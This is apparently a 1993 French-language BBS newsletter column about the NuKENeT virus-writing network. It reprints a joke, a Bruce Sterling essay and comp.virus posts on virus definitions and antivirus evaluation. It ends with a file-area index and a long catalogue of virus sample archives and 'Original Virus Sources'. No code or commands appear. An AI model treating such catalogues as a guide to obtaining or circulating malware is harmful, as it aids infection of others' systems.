from the interecpt of a cordless conversation.....

ned239

Q. Is Windows a virus?

A. No, Windows is not a virus.Here's what viruses do:

1. They replicate quickly -- okay, Windows does that.

2. Viruses use up valuable system resources, slowing down the
system as they do so -- okay, Windows does that.

3. Viruses will, from time to time, trash your hard disk -- okay,
Windows does that too.

4. Viruses are usually carried, unknown to the user, along with
valuable programs and systems. Sigh.. Windows does that, too.

5. Viruses will occasionally make the user suspect their system is
too slow (see 2) and the user will buy new hardware. Yup, that's
with Windows, too. Maybe Windows is a virus.......Nope! There is
a difference! Viruses are well supported by their authors, are
frequently updated,and tend to become more sophisticated as they
mature.Therefore, windows is not a virus.


-------

But Windows take 4,867,045 Bytes more than a virus...

-------


Msg #: [267/284] Base: General Topics [NuKENeT]
Date : Sat 30 Jan 1993 9:31a Stat: Sent Local
From : Ned239
To : All
Title: interesting info

check this out;
Topic 16: Bruce Sterling Live at Mondo....
#123: Bruce Sterling (bruces) Sun, Aug 23, '92 (15:06) 56 lines

COMPUTER AS FUROSHIKI

"
Computer as furoshiki" is a highly speculative vision of the
personal computer as it might evolve if freed from certain current
material constraints.
The furoshiki is an intimate and ubiquitous accessory to

  
Japanese
daily life. It's nothing more than a large square of tough, well-made
cloth, usually with a handsome pattern. The furoshiki is used, among
other purposes, as a grocery bag, a book-tote, and a decorative wrapper
for ceremonial gifts. In its simplicity and multiple uses it is little
different from a cowboy's bandanna, except that the skill in wrapping and
knotting furoshikis is more arcane.
The computer-as-furoshiki is the computer as a large square of
lightweight, flexible cloth. It is not, however, "cloth" as that material
is currently understood.
The furoshiki's display screen is formed by thin bands of
color-emitting optical fibers, which are wide enough and bright enough to
mimic the scan-lines of a video display terminal. These display-fibers
are interwoven with other fiber-optics carrying data.
A second kind of fiber is densely interwoven; it consists of
room-temperature superconductive wire, possibly a novel form of
buckminsterfullerene for strength and flexibility. This highly-charged
net of superconductors serves as a literal power-grid.
The third fiber is some currently-unknown form of piezoelectric
filament that can contract, relax, and therefore warp and knot itself in
response to precise electrical charges deployed along its length.
A fourth form of fiber serves as a radio antenna and communications
grid.
One section of the cloth can be radically stiffened to serve as the
diaphragm for an audio speaker.
Computation, memory, and movement are carried out by photonic,
photoelectronic, and electronic chips composed of custom-built artificial
diamond for low cost and strength. If the tensile fibers are composed of
organic proteins (which would seem likely), then the computer-as-furoshiki
consists mostly of carbon.
The device is operated with voice commands and touch, and possibly
gesture, through a similarly woven linked glove.
The computer-as-furoshiki is capable of limited movement. Early
versions might fold themselves up like a gentleman's handkerchief; later
models would resemble aluminum foil or Saran Wrap. Advanced versions can
fly.
Although this computer lacks direct video input, it might be capable
of optical character recognition if placed on a page, or of image-scanning
if placed on a graphic.
When placed on light-sensitive paper, or film, it generates
hard-copies. This computer might displace paper as a medium by usurping
not merely the information of paper but the physical properties of paper
as well.
When one's head is wrapped completely in the furoshiki, it becomes a
virtual-reality rig.
When not in use, the furoshiki is worn, as a scarf, tie, turban, or,
or course, the Console Cowboy's bandanna. Mainframes can be used as
pup-tents, supercomputers as Big Tops, for a late twenty-first-century
multimedia circus.

something to get the neurons firing.....
ned239
___________

C'‚tait un premier survol du NuKENeT, mesdames et messieurs. Nous allons
maintenant descendre un peu au ras du sol, histoire de survoler la
messagerie locale de Cybernetic Violence. Attachez vos ceintures!

-------

Msg #: [82/82] Base: General Msgs [LOCAL]
Date : Fri 12 Feb 1993 9:45p Stat: Public
From : A K 4 7 #122
To : All
Title: X rated GIFS.......


If there is anyone out there that knows the #'s to any boards that have
a LOT of X rated GIFS, please post the area codes and #'s here. Thanks.

-------

Mmmmmmpppppppffffff!!! Bon, ok! Ce message est local... Mais
quand mˆme, on pourrait l'aider ce jeune adolescent en rut...
Essaie l'AGBE! (M‚chante gang de pattes folles)...

Un simple commentaire:

1- A-t-on besoin de payer 0,30$ / Minute de Ld … Mtl pour voir
ce genre de commentaire? No! Never!

Ahhhhhhhhhhhhh! Ca fait du bien d'ˆtre m‚chant un peu! Je commencais …
m'inqui‚ter, … force de ne pas pouvoir placer une pique! Faut dire qu'avec
Cybernetic Violence, il n'y a pas beaucoup de conneries sur ce board.
C'est une denr‚e rare...

Non, s‚rieux, les mecs de NukE ont pouss‚ la perversit‚ jusqu'… espionner
l'ennemi, les gars de l'AV (anti-virus). Pour ce faire, ils ont mis sur
leur Net les posts du site d'Internet o— s'‚crivent les Sara Gordon et
autres virus-busters!


Msg #: [4/165] Base: Comp.Virus
(Internet)[NuKENeT]
Date : 13 Jan 93 17:13:43 Stat: Sent
From : padgett
Title: What is a virus ?
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson)

There have been a number of learned comments on "beneficial" viruses
and the horrors thereof. I have not read Dr. Cohen's papers (if they
are available on the net, I would appreciate either FTP instructions
or their E-Mail - not being at a University has its limitations),
however I do have some opinions.
First, a virus appears to be executable code that propagates by
attaching itself to other programs. If it were a stand alone (not
requiring a host) it would be a Worm. If it did not propagate, it
might be a logic bomb, a trojan horse, or simply a program, but it
would not be a virus. Propagation is part of the definition.
Obviously companion & path viruses do not meet this test since they
do not attach themselves to other programs, rather they spoof the
OS into executing them instead of the requested program.
MBR and BSI infections are questionable. AZUSA in particular replaces
the entire MBR code and is probably more properly termed a logic bomb
than a virus (of course the popular definition calls *all* malicious
software viruses, but we are talking laboratory definitions now).
Therefore, to be strictly a virus, a program (xA) must affect a change
to another program (B) that adds the functionality of A to (B) such that
the function of a third program (C) can also have the functionality of
(A) added to it by the new program (BA).
In other words when xA executes in the presence of B, B becomes BA.
When BA executes in the presence of C, C becomes CA (*not* CBA).
Further, to be a *beneficial* virus, BA must retain all of the
functionality
of B unless some function(s) is to be specifically (and documentedly)
modified.
Here the Turing Halting Rule has a new effect: A has no way of
determining prior to the change of a random program B to BA whether
this change will be detrimental to the functionality of B. Period.
Now many people including myself have pointed to COPY as an example
of a virus. On reflection this is not true since while it is possible
to say COPY B.COM+COPY.COM B.COM, this will not add the functionality
of COPY.COM to B.COM. COPY cannot propagate itself. It can cause
programs to fail if used this way but that in itself does not make
COPY a virus.
Further, we have discussed the use of a program on a LAN to update
Client programs, but these do not meet the test since (C) cannot be
affected, only (B). Further since (B) has just been updated or
replaced and cannot update anything else once "fixed" this does not
meet the propagation test of a virus.
Consider the recent CHKDSK furor. I posted a simple detection mechanism
and "fix" that could easily be put into a program that might be executed
as searched for CHKDSK.EXE. If found, it is checked. If the old one, the
fix is applied.
THIS IS NOT A VIRUS. The original program's function is not propagated.
(B) did not become (BA), it became (B'). Certainly, if poorly written,
the update could cause damage and the public might call it a virus but
incorrectly.
Therefore, if we accept that to be a virus, the test of A + B = BA
and BA + C = CA must be met, then the Turing Halting Rule makes the
general case of a beneficial virus (cannot cause any harm in any
environment) impossible.
Enough,
Padgett
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)


Msg #: [8/165] Base: Comp.Virus
(Internet)[NuKENeT]
Date : 14 Jan 93 02:10:19 Stat: Sent Ô
Title: What do you want?
From: sara@news.rn.com (Sara Gordon)

Recently I posted request for info from anti-virus product
evaluators/services or persons with opinions on them. Thanks to
all who responded.
Now, I would like to inquire of anti-virus product users/purchasers
(and anyone who would care to respond):

1. What are the three most important factors you consider when
purchasing an anti-virus product? When your responses reference
technical capabilities, please be as specific as possible in
defining the capability which is important to you.

Please e-mail the responses, which will be categorized and published
as part of a little project i've undertaken to evaluate the 'evaluators'
:)
For those persons who asked me what kind of responses I have gotten
from the evaluators and product developers, it is this way: so far
the evaluators -for the most part- are not interested/willing to say
- -how- they evaluate anti-virus products. I am specifically interested
in finding information such as a.) what provisions are used to evaluate
heuristic modes of a-v products b.) what provisions are taken/made in
dealing with false positives c.) exactly (EXACTLY) what kind of machines
are these evaluations performed using? drives? boxes? hardcards? what
video displays, what dos versions?
This is relative only to standalone PC's, but even with this limitation,
I have had remarkable non-success in finding out exactly who is doing
what, and how they are doing it.
If you have any information you could share with me, I would appreciate
an e-mail from you !!
p.s. almost all people when asked what is the major problem with
evaluating state: not enough viruses, not enough time. some state
too many viruses, not enough time. concensus appears NOT ENOUGH TIME.
- --
# "talk to me about computer viruses............"
# fax/voice: 219-277-8599 sara@gator.use.com
# data 219-273-2431 SGordon@Dockmaster.ncsc.mil
# fidomail 1:227/190 vfr@netcom.com
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)


Date : 14 Jan 93 10:55:12 Stat: Sent
From : dklefkon
Title: Contents of conference proceedings, Ides of March
From: dklefkon@well.sf.ca.us (Richard W. Lefkon)

Nine days ago, FCWturing posted a protest to Virus-L concerning the
current ban on publishing viruses within the Proceedings of the
International Computer Security & Virus Conference.
I'm program chair and will try to be brief explaining what and why.
Those interested in the conference can call 800-835-2246 x190 and
get further informatin about March 10-12 in New York City.

1. The conference and its committee are NOT spokespersons for
DPMA/ACM/IEEE or the other five societies and five trade
publications involved. The local DPMA chapter hosts the
conference and organizations like ACM-SIGSAC and IEEE Computer
Society are cooperating sponsors.
As an example, IEEE sponsors literally HUNDREDS of worthwhile
seminars and conferences per year. But if IEEE wants to take
a position, its appropriate board will do that, not a conference.
Incidentally, the most recent position taken by the DPMA chapter
was in opposition to New Jersey programmer licensing legislation.
While this particular 1991 stance eventually did bubble up to
the top, the chapter does not speak for DPMA at large and the
conference does not speak for the chapter.

2. The ban on publishing viruses in the proceedings was put into
effect with last year's (5th International) conference. It
resulted from a post-mortem e-mail discussion by the conference
committee based on contents of the 1990 (4th) gathering.
Mr. Fred Cohen is a valued memember of the 16-person conference
committee, but at the time of the deliberations he (like me a
year before) wasn't on a regular e-mail host. Pretty clearly,
he is now. And he WILL have the chance to influence the rules
that govern NEXT year's (7th International) conference.

3. Rationale.

I don't necessarily agree with every punctuation mark of the
position concerning publishing code fragments, but it WAS a
vote/consensus of the conference committee, approximately thus:

a. By definition, those who attend this conference have
the resources to take off 2 or 3 days from work and
pay the modest registration fees.
Especially those who have attended before, they are pretty
well-connected in the technical community and if really
motivated could obtain the stuff you might not want your
5-year-old to fool with.
Among the 20% who are full-time security people, this is
especially true - and one reason why the anti-virus products
were fully prepared in '92 for "Michelangelo" was that most
of the major players had representatives here in '91 on
March 14 when Roger Riordan of Australia laid out how he
had discovered the thing a month beforehand, during his
scheduled speech at the conference.

b. Those whose ONLY contact with the conference is the
Proceedings, could very well have considerably less ability
to "get the code, no matter what." If the Proceedings
is on the shelf of their library, e.g., it may be their
first and only contact with viruses.
So why give the true beginners a practice set of viruses?

c. Therefore, last year and this year, speakers who dissectÔ
York, are permitted to distribute a non-Proceedings handout
to attendees.

d. Rest assured, that "c" necessitated a good-will compromise on
the part of those at the other end of the opinion spectrum
from Fred.

e. This April, procedures for the 1994 conference will be fixed
by consensus of the committee members. They will take into
account the experiences of the March 10-12 1993 sessions.
Anyone who doubts that the committee responds to realities
experienced, has only to be reminded that THIS conference
will be managed by Expoconsul, the managers of DEXPO and
other big events - NOT by the chapter volunteers who did
this task in previous years.
That's because, based on feedback, the committee was
unanimous in its sentiment that "Ides of March" clearly
hundreds of attendees past the point where it could be
run properly by amateurs.
---
* Origin: FidoNet/USENET Gateway [csource.oz.au] (3:632/400.0)


-------

Hep les mecs... C'est d‚j… tout pour les messages... Pas pour
dire qu'y en a pas beaucoup, NOT!! , Y en a des tonnes... Le
NuKeNet est ax‚ sur le Virus Talking, comme vous l'avez vu... Que dire de
plus...

Cot‚ fichiers, Virus, CDC, PP, CPI Newsletters, LOL, CUD, PHRACK... Et
quelques autres... Tirez vos propres conclusions. Voici les sectins
fichiers :


NNN:Flag:Title :NNN:Flag:Title
===:====:==============================:===:====:======================

0 *--A [ UPLOAD ] 1 *--A [ Anti-Virii ]

2 *--A [ Virus # To L ] 3 *--A [ Virus M To Z ]

4 *--A [Original Virus Sources] 5 *--A [ Disassembled Viruses]

6 *--A [Virus Magazines & Text] 7 *N-A [ NuKE Warez ]

-N-A [ NuKE Private ] 8 *--A [H/P Magazines 'n Texts]

9 *--A [ H/P Utilities ] 10 *--A [ Phreaking Related ]

11 *--A [Anarchy Progs. & Texts] 12 *--A [ PHRACK Inc. Magazine]

13 *--A [ Cult Of The Dead Cow ] 14 *--A [ CryPt Newsletter ]

15 *--A [ CPI Newsletter ] 16 *--A [ CUD Magazine ]

17 *--A [ LOL Magazine ] 18 *--A [ PPP Magazine ]

19 *--A [ Virus-L Digest ] 20 *--A [ Misc. Files ]


On parle encore virus, l…. Voici un ‚chantillon des sections virus, et de
ce qu'on peut y trouver...

[ Virus # To L ] #2
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Filename.Ext Bytes Description
-------- --- -------
-------------------------------------------------------
!J4J .ZIP 1 50 Plaice (1273 - Generation 1 -) Virus
100YEARB.ZIP 33 50 100-Year Virus Strain B (Frodo) [4096]
1022 .ZIP 3 50 Fellowship Virus [Fellow]
1024-B .ZIP 3 50 Nomenklatura (1024-B) [Nom]
1024PRSC.ZIP 1 50 PrtSc 1024 Virus [PS10]
1033 .ZIP 12 50 Fax Free (Pisello/1030) Virus [1030]
1049 .ZIP 1 50 1049 Virus [Alf]
1075 .ZIP 1 50 Zaragoza 1075/Minsk Virus [Zar]
10PASS3 .ZIP 1 50 10 Past 3 (748) Virus [748]
1193 .ZIP 2 50 Copyright Virus (1193) [1193]
1210 .ZIP 5 50 Prudents 1210 Virus [1210]
1244 .ZIP 2 50 1244 Virus [1244]
1253 .ZIP 2 50 1253 Virus [1253]
1260 .ZIP 1 50 1260 Virus [1260]
1381 .ZIP 1 50 Internal (1381) Virus
1530 .ZIP 3 50 Rape 1530 Virus [1530]
1554 .ZIP 1 50 1554 Virus [1554]
1554B .ZIP 5 50 1554 Strain B Virus [1554]
1559 .ZIP 18 50 1559 Virus
1575 .ZIP 2 50 1575 (Green Caterpillar) Virus [15xx]
1575-C .ZIP 5 50 1575-C (Green Caterpillar) Virus [15xx]
15APR .ZIP 1 50 Murphy - Swami Generation 1 - [Murphy]
15XX .ZIP 31 50 1575 Virus [15xx]
1600 .ZIP 1 50 Jerusalem Virus (1600) [Jeru]
1605 .ZIP 3 50 Jerusalem Virus (1605) [Jeru]
1701B .ZIP 1 50 1701 Virus, Strain B [170x]
1701MUTA.ZIP 2 50 1701 Mutation
1704 .ZIP 4 50 Cascade Virus (1704) [170X]
1704-B .ZIP 3 50 1704 Virus, Strain B [170x]
1704-C .ZIP 3 50 Cascade Virus (1704-C) [170X]
1704FRMT.ZIP 2 50 Cascade Virus (1704-Format) [170X]
170X .ZIP 4 50 170X Virus [170x]
17Y4 .ZIP 8 50 Cascade 17Y4 Virus [170X]
1963 .ZIP 4 50 1963 Necropolis Virus [1963]
1992 .ZIP 1 50 1992 Virus
1992-SK .ZIP 1 50 Skism 1992 Virus
1992_B .ZIP 1 50 1992 Virus, Strain B
2144 .ZIP 2 50 USSR-2144 Virus [U2144]
2480-2 .ZIP 1 50 2480-2 (Family-M/Crew) Virus [FM]
257 .ZIP 1 50 Kemerovo Virus (257) [Kem]
2623 .ZIP 8 50 2623 Virus [2623]
30 .ZIP 1 50 Mini Virus [M45]
3012 .ZIP 4 50 Jerusalem (AntiCad-3012/Plastique) [Plq]
307 .ZIP 1 50 Timid Virus (307) [Tmd]
3103 .ZIP 4 50 USSR-3103 Virus [Svc50]
311 .ZIP 0 50 USSR-311 Virus [U311]
312VIRUS.ZIP 13 50 312Virus
:This one is NOT exactly a Virus.. But it is FUNNY!
:Is able to run the poor sucker's Phone Bill
:through the roof!
334-2 .ZIP 3 50 334-2 Virus [ARCV] UnScaned COM
337 .ZIP 0 50 337 Virus [337]
3445 .ZIP 3 50 3445-Stealth Virus [3445]
382 .ZIP 0 50 382 Virus [382]
4 .ZIP 2 50 4 Virus [Con] VCL
405 .ZIP 0 50 405 Virus [Burger]
4096 .ZIP 3 50 4096 Virus [4096]
483 .ZIP 0 50 483 Fam3 Virus (Resurrect) [F3]
486 .ZIP 2 50 486 Family Virus (Rage) [FM]
492 .ZIP 0 50 USSR-492 Virus [U492]
4MAT2 .ZIP 1 50 4 MAT 2 Virus
512 .ZIP 0 50 512 Virus [512]
512-B .ZIP 0 50 512 Virus, Strain B [512]
512-E .ZIP 2 50 512 Strain E Virus [512]
512-F .ZIP 2 50 512 Strain F Virus [512]
512-X .ZIP 0 50 512 Strain A Virus [512]
5120 .ZIP 4 50 5120 Virus
516 .ZIP 0 50 USSR-516 Leapfrog Virus [Leap]
529 .ZIP 2 50 529 Virus [529]
529-1 .ZIP 0 50 529 Virus, Second Strain [529]
529-2 .ZIP 4 50 Piter 529 Virus [529]
535 .ZIP 0 50 535 Virus [VHP]
537 .ZIP 1 50 537 Family-Q Virus (Burger) [FQ]
541 .ZIP 0 50 541 Virus [Burger]
644 .ZIP 2 50 644 Lisbon Virus (Vienna) [Lisbon]
666 .ZIP 1 50 666 Virus (Rock Steady)
666-B .ZIP 1 50 666 Virus, Strain B (Rock Steady) [RKO]
696 .ZIP 0 50 696 FamR Virus [FR]
707 .ZIP 2 50 USSR-707 Virus
711 .ZIP 2 50 711 Family Virus (13 Minutes) [FM]
712 .ZIP 2 50 712 UNK Virus (Fumble) [UNK]
7808 .ZIP 5 50 7808 Virus (Pascal) [7808]
789 .ZIP 1 50 789 Zaragoza Virus (FileHider) [Zar]
7SON .ZIP 0 50 7thSon Virus [7s]
7SON2 .ZIP 1 50 7th Son II (332 Generation) [F-Prot]
801 .ZIP 6 50 Dot-801 Virus (StarDot) [I-F]
812 .ZIP 1 50 812 JW2 Virus (Jabberwocky) [Jab]
817 .ZIP 1 50 DOt-801 Virus (StarDot-Modified) [I-F]
855 .ZIP 32 50 855 Virus (November 17th) [855]
905 .ZIP 1 50 905 Virus [905]
911 .ZIP 2 50 911 Armagedon Virus [Arma]
981 .ZIP 16 50 981 Fichv Virus [FCH]
994 .ZIP 2 50 994 Nina Virus (DotEater) [Nina]
ACME .COM 1 50 ACME companion virus - from Cryptletter 9
ADA .ZIP 3 50 Ada Virus [Ada]
ADOLPH .ZIP 2 50 Adolph Virus [V2P6]
ADVENT .ZIP 2 50 Advent Virus [SysLock]
AGIPLAN .ZIP 1 50 AgiPlan Virus [AGI]
AIDS@ .ZIP 10 50 Aids Virus [N1]
AIDSII .ZIP 5 50 AIDS ][ Virus [A2]
AIRCOP .ZIP 1 50 AirCop Virus
AIRCOP2 .ZIP 1 50 AirCop ][ Virus [Dr2]
AKUKU .ZIP 1 50 Akuku Virus [Akuku]
ALA-1652.ZIP 2 50 Ala Virus [Alabama]
ALABAMA .ZIP 1 50 Alabama Virus (1560) [Alabama]
ALEMEDA .ZIP 10 50 Alemeda Virus
ALLO .ZIP 7 50 Allo Virus
AMBULANC.ZIP 1 50 Ambulance Car Virus [RedX]
AMILIA .ZIP 2 50 Amilia Virus (Rock Steady) [Murphy]
AMOEBA .ZIP 3 50 1392 Amoeba Virus [1392]
AMOEBA-2.ZIP 1 50 Amoeba ][ Virus [1392]
AMST-299.ZIP 1 50 Amstrad 299 Virus [Pix]
AMST-345.ZIP 1 50 Amstrad 345 Virus [Pix]
AMST-740.ZIP 1 50 Amstrad 740 Virus [Pix]
AMST-847.ZIP 1 50 Amstrad 847 Virus [Pix]
AMST-850.ZIP 1 50 Amstrad 850 Virus [Pix]
AMST-852.ZIP 0 50 Amstrad 852 Virus [Pix]
AMSTRAD .ZIP 0 50 Amstrad Pure Strain Virus [Amst]
AMUSAK .ZIP 6 50 Amusak Virus
ANARKIA1.ZIP 1 50 Anarkia Virus [Jeru]
ANARKIA2.ZIP 2 50 Anarkia-2 (Jeru Related) [FU]
ANNA .ZIP 3 50 Anna Virus [ARCV] UnScaned COM
ANTHRAX .ZIP 1 50 Anthrax Virus [Atx]
ANTIC10K.ZIP 19 50 Famous 10k Virus
ANTICAD .ZIP 1 50 AntiCad Virus (1253) [1253]
ANTICST .ZIP 1 50 Anti-Christ Virus [Pest]
ANTIFAG .ZIP 1 50 Anti-Fag Virus [VHP]
ANTIFIRE.ZIP 0 50 Anti-Fire Virus
ANTIMON .ZIP 2 50 Antimon Virus [1453]
ANTITEL .ZIP 1 50 Anti-Tel Virus ( Boot Sector ) [A-Vir]
ANTI_D .ZIP 2 50 Anti_D (or FamR) Virus [FR]
ANTI_DAF.ZIP 3 50 Anti DAF virus
AP-400 .ZIP 0 50 Anti-Pascal 400 Virus [AP]
AP-440 .ZIP 0 50 Anti-Pascal 440 Virus [AP]
AP-480 .ZIP 0 50 Anti-Pascal 480 Virus [AP]
AP-529 .ZIP 0 50 Anti-Pascal 529 Virus [AP-2]
AP-605 .ZIP 0 50 Anti-Pascal 605 Virus [AP-2]
APOC .ZIP 3 50 Apocalypse Virus [Jeru]
APOCII .ZIP 2 50 Apoc ][ Virus [2000]
ARCV-1 .ZIP 2 50 ARCV #1 [ARCV] UnScaned COM
ARCV-2 .ZIP 2 50 ARCV #2 [ARCV] UnScaned COM
ARCV-3 .ZIP 2 50 ARCV #3 [ARCV] UnScaned COM
ARCV-4 .ZIP 2 50 ARCV #4 [ARCV] UnScaned COM
ARCV-5 .ZIP 2 50 ARCV #5 [ARCV] UnScaned COM
ARCV-6 .ZIP 1 50 ARCV #6 [ARCV] UnScaned COM
ARCV-7 .ZIP 2 50 ARCV #7 [ARCV] UnScaned COM
ARCV-8 .ZIP 2 50 ARCV #8 [ARCV] UnScaned COM
ARCV-9 .ZIP 2 50 ARCV #9 [ARCV] UnScaned COM
ARCV93 .ZIP 2 50 ARCV'93 Virus [ARCV] UnScaned
ARCVSAND.ZIP 3 50 ARCV Snadwiich Virus [ARCV] UnScaned TSR-COM
ARF .ZIP 1 50 Arf Virus (Parasite) [Par]
ARF-B .ZIP 0 50 ARF Strain B Virus [VHP]
ARMAGEDO.ZIP 1 50 Armaggedon Virus [Arma]
ASHAR .ZIP 2 50 Ashar Virus (Brain-Dropper) [Drp]
AT144 .ZIP 0 50 AT144 Virus [144]
ATTENTN .ZIP 0 50 Attention Virus (USSR-394) [U394]
AZUSA .ZIP 4 50 Azusa Virus
BACKTIME.ZIP 0 50 Backtime Virus [BT]
BADBOY .ZIP 1 50 Bad Boy Virus [BB]
BADBOY2 .ZIP 1 50 Bad Boy Strain ][ Virus [BB]
BADGUY-2.ZIP 0 50 BadGuy Virus Strain 2 (I-B) [IB]
BADTASTE.ZIP 2 50 Badtaste Virus (Murphy) [Murphy]
BANANA .ZIP 1 50 Banana Virus (Trivial) [OW]
BANDIT .ZIP 1 50 Bandit Virus [Ban]
BARCELON.ZIP 4 50 Barcelona Virus [Barc]
BASICVIR.ZIP 5 50 Basic Virus
BATVIR .ZIP 0 50 Batch File Virus
BB .ZIP 0 50 Bad Brains Virus
BEAST .ZIP 0 50 Beast-N-Black Virus [GenF]
BEBE .ZIP 2 50 BEBE Virus [BeBe]
BEDTIME .ZIP 4 50 Bedtime Virus
BEEPER .ZIP 2 50 Beeper Virus [Beep]
BEST .ZIP 1 50 Best Wish Virus [BWish]
BFD .ZIP 3 50 BFD Virus [BFD]
BLAZE .ZIP 0 50 Eternal Blaze Virus
BLJEC3 .ZIP 0 50 Bljec-3 Virus [Blj]
BLJEC4 .ZIP 0 50 Bljec-4 Virus [Blj]
BLJEC5 .ZIP 0 50 Bljec-5 Virus [Blj]
BLJEC6 .ZIP 0 50 Bljec-6 Virus [Blj]
BLJEC8 .ZIP 0 50 Bljec-8 Virus [Blj]
BLJEC9 .ZIP 0 50 Bljec-9 Virus [Blj]
BLOOD .ZIP 0 50 Blood Virus [Blood]
BLOODLUS.ZIP 1 50 Blood Lust Virus [Blus]
BLOODY .ZIP 0 50 Bloody Virus ( Boot Sector ) [Bloody]
BMONDAY .ZIP 1 50 Black Monday Virus [BMon]
BOBINST .ZIP 12 50 Bob Ross Virus Installer v.99b
BOBVIRUS.ZIP 8 50 Bob Virus [Bet]
BOOKOVIR.ZIP 72 50 Book of Viruses (Various Virii)
BOOT1 .ZIP 2 50 Boot 1 Virus (Ping Pong -B) [Ping]
BOOT2 .ZIP 2 50 Boot 2 Virus
BOYS .ZIP 0 50 Boys Virus [Boys]
BRAINVRS.ZIP 0 50 Pakistani Brain Virus [Brain]
BRENDA .ZIP 0 50 Brenda Virus [Tiny]
BRN_ASH .ZIP 47 50 Brain Ashar Virus [Brain]
BROTHER .ZIP 1 50 Brother Virus
BUBBLE .ZIP 1 50 Bubble Virus (1244) [1244]
BURGER@ .ZIP 4 50 Burger Virus [Burger]
BURGR541.ZIP 2 50 Burger-541 Virus (Family-Q) [FQ]
BUSH .ZIP 0 50 Bushishiro Virus [GenF][VHP]
BUSTED .ZIP 0 50 Busted Virus [Bst]
BUTSTINK.ZIP 4 50 Butt Stink Virus ( Who makes up these names? )
CANCER .ZIP 0 50 Cancer Virus [Pix]
CANNAB2 .ZIP 0 50 Cannabis-2
CANSU .ZIP 0 50 Cansu/V-Sign Virus
CAPTRIPS.ZIP 27 50 Captain Trips Virus [Jeru-A]
CARIOCA .ZIP 1 50 Carioca Virus [Carioca]
CASCADE .ZIP 1 50 Cascade Virus [170X]
CASCDE-A.ZIP 4 50 Cascade (1701-A) Virus [170X]
CASPER .ZIP 1 50 Casper Virus [Casper]
CATMAN .ZIP 1 50 Catman Virus [Ctm]
CAZ .ZIP 2 50 CAZ Virus [F-prot]
CBOMBER .ZIP 12 50 Bomber Virus [Bmb]
CD .ZIP 2 50 CD Virus [CD]
CDM11 .ZIP 2 50 Cinco de Mayo 1.1 Infects COM B4 12:00 EXEs after
:Cinco de Mayo virus. Infects COM files before noon
:EXE files after noon and a surprise on May 5th.
:[MPC]/[VCL] Hybrid
CEMETARY.ZIP 3 50 Cemetary Virus [Pest]
CHEEBA .ZIP 3 50 Cheeba Virus [Che][CHB]
CHEESY .ZIP 0 50 Cheesy Virus
CHNG-MPC.ZIP 2 50 Chuang Virus (MPC Production) [MPC]
CHRONO .ZIP 3 50 Chrono Virus
CHUANG .ZIP 1 50 Chuang Virus (VCL Production) [Con] VCL 5
CIA .ZIP 1 50 CIA Virus [Burger]
CIA2 .ZIP 3 50 CIA Virus (Burger/Family-Q) [FQ]
CINDER .ZIP 2 50 Cinderella Virus (FamS) [FS]
CIVIL_4B.ZIP 4 50 Civil War 4B
:Rewritten with TPE 1.3
CIVIL_4C.ZIP 2 50 Civil War 4C
:Rewritten with TPE 1.3
CLONE .ZIP 18 50 Clone Virus (Jerusalem) [Jeru]
CODEZERO.ZIP 0 50 Code Zero Virus
COLUMBUS.ZIP 14 50 Columbus Virus
COMDEX .ZIP 25 50 Comdex Virus
COOKIE .ZIP 3 50 Cookie Virus
COP-MPL .ZIP 2 50 Variation of Akuka
COSSIGNA.ZIP 2 50 Cossigna Virus [1204]
CRASH .ZIP 2 50 Crash Dummy Virus (VCL Product) [Con] VCL 5
CREEPER!.ZIP 2 50 Creeper Virus [Crp]
CRF .ZIP 0 50 CRF Virus [Crf]
CRIMEIIB.ZIP 1 50 DataCrime 2B Virus [Crime-2B]
CRUMBLE .ZIP 2 50 Crummble Virus (Falling Letters) [Crm]
CRYPTM .ZIP 8 50 CryptM Virus [Mut][DAME]
CRZYEDIE.ZIP 1 50 Crazy Eddie Virus
CVIRUS .ZIP 25 50 C Virus [CV]
CVIRUS20.ZIP 11 50 C-Virus v2.0 (NuKE)
CVIRUS21.ZIP 15 50 C-Virus v2.1 ( NuKE )
CVIRUS3 .ZIP 11 50 C-Virus v3 ( NuKE )
CW .ZIP 1 50 CW Virus (VirusDemo Clone) [Burger]
CYBER101.ZIP 3 50 Cybertel v1.01 Virus
CYBERTEL.ZIP 3 50 Cybernetic Intelligence Virus
D-DANCE .ZIP 1 50 Devil's Dance Virus [Dance]
D-FX .ZIP 2 50 Death F/X Virus [Blj]
D-FX2 .ZIP 0 50 Death F/X ][ Virus
DAMAGE .ZIP 2 50 Damage Virus [Alf]
DAMIEN .ZIP 0 50 Damien Virus
DARKAVEN.ZIP 1 50 Dark Avenger Virus [Dav]
DARKLORD.ZIP 1 50 Dark Lord Virus [Ter]
DARTH2 .ZIP 0 50 Darth Vader ][ Virus [512]
DARTH4 .ZIP 0 50 Darth-4 Virus [512]
DATACR-2.ZIP 2 50 DataCrime 2 [DC-2]
DATACR-B.ZIP 2 50 DataCrime 1B [Crime]
DATACRIM.ZIP 1 50 Datacrime Virus (1168) [Crime]
DATALOCK.ZIP 1 50 DataLock Virus [Data]
DATCRM2B.ZIP 1 50 DataCrime 2B Virus [C-2B]
DAVEN-B .ZIP 1 50 Dark Avenger Virus, Strain B [Dav]
DAVID .ZIP 1 50 David Virus [Alf]
DBASE .ZIP 1 50 DBase Virus [Dbase]
DBL_VISN.ZIP 5 50 Double Vision Virus
DC-1168 .ZIP 1 50 DataCrime 1168 Virus [Crime]
DC-B .ZIP 0 50 Death Cow Virus, Strain B
DDAY10A .ZIP 3 50 Dooms Day V1.0A Virus
DDRUS .ZIP 0 50 Ddrus Variant Of Vienna
DEADLY .ZIP 10 50 Deadly Virus (Jerusalem) [Jeru]
DEADPOOL.ZIP 1 50 DeadPool Virus
DEATHCOW.ZIP 0 50 Deathcow Virus
DEFINE .ZIP 0 50 Define Virus [Def]
DEICIDE .ZIP 0 50 Deicide Virus [Dei]
DELYRIUM.ZIP 1 50 Delyrium (Murphy Strain) [Murphy]
DEMOLITN.ZIP 1 50 Demolition Virus [Dmo]
DEMON .ZIP 0 50 Demon Virus [Demon]
DENZUK .ZIP 5 50 Den Zuk Virus [DenZuk]
DEST2 .ZIP 1 50 Dest ][ Virus [DES]
DESTI .ZIP 3 50 Desti Virus
DESTRUCT.ZIP 1 50 Destructor Virus [Destr]
DHOG .ZIP 3 50 Define Virus [Def]
DIABOLIK.ZIP 1 50 Diabolik Virus [Murphy]
DIAMOND .ZIP 1 50 Diamond Virus [1024]
DIOGENES.ZIP 3 50 DioGenes Virus (New VCL)
